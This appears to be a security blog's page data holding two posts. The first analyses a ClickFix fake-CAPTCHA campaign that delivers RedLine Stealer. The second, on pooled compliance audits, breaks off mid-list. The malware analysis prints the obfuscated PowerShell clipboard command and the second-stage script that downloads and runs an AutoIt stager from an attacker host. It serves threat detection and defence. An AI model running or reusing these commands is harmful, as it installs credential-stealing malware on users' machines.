{
    "componentChunkName": "component---src-templates-blog-blog-list-template-blog-list-template-js",
    "path": "/articles/2",
    "result": {"data":{"allContentfulSecOktaComBlogPost":{"nodes":[{"updatedAt":"2025-07-09T13:49:44.963Z","slug":"/articles/2025/07/how-this-clickfix-campaign-leads-to-redline-stealer","node_locale":"en","date":"2025-07-03T00:00","secAuthor":[{"name":"Tom Simpson","slug":"/hackers/tom-simpson","jobTitle":"Detection and Response Engineer","id":"e9cc3726-fe50-559a-9a1a-adada488dd9e","bio":{"bio":"<p> Tom Simpson is a Staff Detection and Response Engineer within Okta’s Defensive Cyber Operations team. Tom has spent a decade in the security industry and is an expert at intrusion research, incident response and engineering of secure systems, which he’s demonstrated at Okta, TikTok USDS, CrowdStrike, and in the Australian Defence industry. Tom currently holds the GSEC, GCIH and GREM, having previously volunteered as a SANS teaching assistant. Tom enjoys researching the latest trends in Adversary tactics and sharing his findings through security research blogs and conference talks.</p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 
100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#080808","width":58,"height":58}}},{"name":"Daniel López","slug":"/hackers/daniel-lopez","jobTitle":"Cyber Threat Researcher","id":"22dea194-5ef2-5cfb-8c46-f89bf610a204","bio":{"bio":"<p> Daniel López is a Cyber Threat Researcher at Okta, where he focuses on tracking threat actor activity and the evolving threat landscape to best protect Okta’s employees and customers. Prior to joining Okta, Daniel worked at international companies across the consulting, financial services, and technology sectors. 
He enjoys participating in trusted infosec groups, continuously learning (both tech and non-tech topics), and staying physically active.</p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=58&h=58&q=50&fm=png","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=15&h=15&q=50&fm=png 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=29&h=29&q=50&fm=png 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=58&h=58&q=50&fm=png 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=116&h=116&q=50&fm=png 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#182828","width":58,"height":58}}}],"title":"How this ClickFix campaign leads to Redline Stealer","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"ClickFix campaigns exploit user trust and problem-solving instincts to bypass conventional security 
measures."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An overwhelming share of the user credentials that are later abused in identity-based attacks arise from the compromise of unmanaged user devices. “Infostealers” is the generic name given to the class of malware designed primarily with this purpose in mind. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While infostealers are distributed via numerous means — with pirated games being high on the list — more recently, our analysts have observed malware being distributed using a deceptively simple technique: a ClickFix campaign.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Often referred to as a \\\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Prove You Are Human\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\\" campaign, a ClickFix campaign exploits user trust and problem-solving instincts to bypass conventional security measures.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Convincing a user to install malicious code\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the ClickFix attacks we’ve observed, attackers pay search engines to elevate their phishing pages when users search for the names of popular web applications. 
The sponsored link redirects the user to a website that impersonates the brand in question.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These deceptive pages will mimic legitimate security checks, such as CAPTCHA challenges that are used to prove whether a site visitor is interactive (vs a bot). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These fake CAPTCHA or verification-type overlays lend legitimacy to the subsequent instructions provided to the user. The page might even subtly mimic the background image used in a real CAPTCHA service to enhance its credibility further.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here’s an example of a site impersonating a Cloudflare CAPTCHA challenge for a user attempting and expecting to visit Okta at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://www.asqula.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"www.asqula.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6JznFdLiy4AKckMpqdtZOZ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nOnce the unsuspecting user interacts with this page, specifically by selecting “verify you are human,” they’re presented with a set of instructions designed to trick the user into downloading malware. 
Two versions are provided below: one targeting MacOS users, and the other targeting Windows users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"gMxEFxg9SQKs0BmpTyUWY\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"75QgUme0sVyjLzh0UoCV8s\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nThese instructions commonly direct the user to perform the following actions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press Windows Key + R\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to open the Run dialog box).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press CTRL + V\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to paste a command).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press Enter\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to execute the command).\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Crucially, the malicious website uses JavaScript to hijack the user's clipboard, silently placing a PowerShell command onto the clipboard without the user’s knowledge, such as the example provided below. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"powershell -WindowS HIDD -c $E='23-ykfgoed8wrvnmj49xlq/pi17bh6t0zau5c.:s'; $ix=$E[24]+$E[12]+$E[15]; $JT='ht'+'tp'+'s:'+'/'+'/' + $E[7]+$E[4] + 'tahu.org/s.php?an=1'; $wF=$E[24]+$E[8]+$E[19]; &$wF (&$ix $JT);\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this case, the PowerShell command was obfuscated, and once executed by the user, calls a site which contained the following malicious code: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"$GDSGFBKSD = [System.Guid]::NewGuid().ToString();$env:MYAPPDATA = (Get-Item $env:APPDATA).Parent.FullName;\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Invoke-WebRequest \",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"hxxps://oktahu\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"hxxps://oktahu\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"[.]org/s.php?an=2 -OutFile $env:MYAPPDATA\\\\$GDSGFBKSD.zip\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" -UseBasicParsing;Add-Type -AssemblyName System.IO.Compression.FileSystem[System.IO.Compression.ZipFile]::ExtractToDirectory(\\\"$env:MYAPPDATA\\\\$GDSGFBKSD.zip\\\", \\\"$env:MYAPPDATA\\\\$GDSGFBKSD\\\");$FHBYREYDBYFB = Join-Path $env:MYAPPDATA $GDSGFBKSD;Set-Location $FHBYREYDBYFB;Start-Process Autoit3.exe launch_traffic4.a3x -WorkingDirectory $FHBYREYDBYFB; Start-Sleep -Seconds 5; Start-Process Autoit3.exe launch_traffic4.a3x -WorkingDirectory $FHBYREYDBYFB;\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This code initiates the download and execution of 
additional malware stages. The PowerShell script downloads a .zip file containing a malicious AutoIt-compiled script, launch_traffic4.a3x, and a legitimate copy of the AutoIT3 execution binary, Autoit3.exe. The malicious script is executed and acts as the initial stager, initiating a complex execution chain.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The infection proceeds as follows:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Initial Launcher\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The executed script spawns a binary Swi_Compiler.exe from the %TEMP% directory.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Persistence:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Swi_Compiler.exe then copies itself to C:\\\\ProgramData\\\\fastpatch\\\\ and executes from there, establishing persistence by creating files in both %APPDATA%\\\\fastpatch\\\\ and %PROGRAMDATA%\\\\fastpatch\\\\ directories.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Loader\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (HijackLoader): Swi_Compiler.exe has been identified as HijackLoader, a loader known to employ various evasion techniques. 
Its configuration includes injecting %windir%\\\\SysWOW64\\\\pla.dll into processes.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Information Stealer\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (RedLine Stealer): HijackLoader proceeds to drop and execute OmegaDynami.exe and XPFix.exe. OmegaDynami.exe is identified as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"RedLine Stealer\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", a prominent information stealer available on underground forums. RedLine Stealer focuses on harvesting sensitive browser information, including saved credentials, autocomplete data, and credit card information from Chrome, Edge, and Firefox. It also collects system inventory data (username, location, hardware, security software details) and attempts to steal cryptocurrency.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Process Injection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": OmegaDynami.exe (RedLine Stealer) exhibits sophisticated process injection capabilities, creating threads and injecting Portable Executable (PE) files into multiple Chrome browser processes. 
It also performs memory mapping operations on Chrome processes with read-write permissions and modifies thread contexts.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How to prevent ClickFix campaigns\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These attacks rely on the assumption that many users don’t understand the risks of executing commands delivered from an untrusted party. They just want to comply with the verification request and get on with visiting what they thought was going to be a legitimate website. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Windows administrators can and should consider allowing the execution of trusted, digitally-signed PowerShell scripts on managed devices and denying all others. macOS administrators should ensure features such as Gatekeeper and System Integrity Protection (SIP) are enabled to protect critical files and processes. Additionally, preexec hooks can be configured within command and scripting interpreters to display a warning confirmation before any interactive command is executed.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Standard perimeter detection controls (email and web filtering) can prevent users on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" devices from accessing \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"known\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" malicious sites. Relying on these defences assumes the malicious site is live for long enough for reputation services to catch on. 
Unfortunately, they don’t do much to prevent users on unmanaged devices, which are more often than not the devices infected with infostealers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For this reason, we recommend restricting access to sensitive applications to devices that are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.asqula.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by Endpoint Management tools and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.asqula.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"protected by endpoint security tools\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". That way, you can be assured that the session tokens for highly sensitive apps are less likely to get scooped up by this commodity malware. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has published a \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/product/okta/clickfix-campaign-targets-okta-brands-drops-redline-stealer\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"detailed adversarial breakdown\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of this ClickFix campaign, including Indicators of Compromise (IoCs) exclusively for security contacts of Okta customers at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/product/okta/clickfix-campaign-targets-okta-brands-drops-redline-stealer\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.asqula.com\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"}},{"updatedAt":"2026-05-18T01:22:01.883Z","slug":"/articles/2025/06/paving-the-path-pooled-audits-with-okta-security","node_locale":"en","date":"2025-06-25T00:00","secAuthor":[{"name":"Lydia Le","slug":"/hackers/lydia-le","jobTitle":"Associate Analyst","id":"fa04ab47-82af-5c37-83c0-2a2a861a79f8","bio":{"bio":"<p>Lydia Le is an Associate Analyst at Okta, providing Assurance support to the Security Customer Trust team. Her commitment to continuous learning and keen attention to detail supports Okta’s mission by securing digital Identities and strengthening customer trust. Outside of work, Lydia enjoys reading, traveling, and exploring new cuisines - always eager to broaden her horizons and learn differing perspectives. 
</p>"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#c8c8c8","width":58,"height":58}}}],"title":"Paving the Path: Pooled Audits with Okta Security","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"Okta has completed another pooled audit, leading the industry by transforming traditional one-to-one assessments into a collaborative, industry-first approach. 
This new model not only streamlines the audit experience but delivers impact: 90% of participating customers reported significantly greater confidence in demonstrating compliance."},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta has completed another pooled audit, leading the industry by transforming traditional one-to-one assessments into a collaborative, industry-first approach. This new model not only streamlines the audit experience but delivers impact: 90% of participating customers reported significantly greater confidence in demonstrating compliance. This new, collaborative model builds on the foundation we've detailed in our previous \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/hackers//hacker/tushar-badlani\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"posts\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" of the Customer Trust series, which cover our team's mission, mandate, and more.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Expanding our Program\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Routine, individual audits have remained crucial for building customer confidence and fostering strong relationships. 
In order to address the inherent time and resource demands of the traditional one-on-one model, we've introduced an innovative pooled audit program designed to work alongside it.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our Customer Audit program directly reflects the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"Love our Customers \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"core value and is a testament to our \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.asqula.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"long-term commitment\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" to lead the industry in the fight against identity-based attacks.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To support our global customers, we’ve launched region-specific regulatory support, starting with the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/05/a-guide-to-dora-compliance-with-okta/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Digital Operational Resilience Act (DORA)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" in the European Union and United Kingdom and, more recently, the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.apra.gov.au/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Australian Prudential Regulation Authority (APRA)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" in Australia. 
As regulatory expectations around cloud service providers continue to evolve, these collaborative audit sessions are helping us proactively meet customer needs while setting a new standard for partnership and trust at scale.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Program Benefits\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta is leading the charge in elevating confidence and clarity across the evolving regulatory landscape. Our program establishes a new industry benchmark, paving a fundamental shift in the collaborative dynamics between critical technology vendors and customers. We bring multiple industry-specific customers into Okta offices for multi-day, hands-on sessions to collectively assess our controls against specific cybersecurity regulations.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In our most recent pooled audit, we thoroughly covered Australian Prudential Regulation Authority (APRA) expectations with our Financial Services Industry (FSI) customers in the region. 
The nine key domains that were covered included:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"BCP and Operational Resilience,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Datacenter Security,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Third Party Risk Management,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Enterprise Risk Management,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Physical Security and Identity Access,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Change Control and Configuration,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Cryptography,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Vulnerability Management, and\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Security Incident Management. 
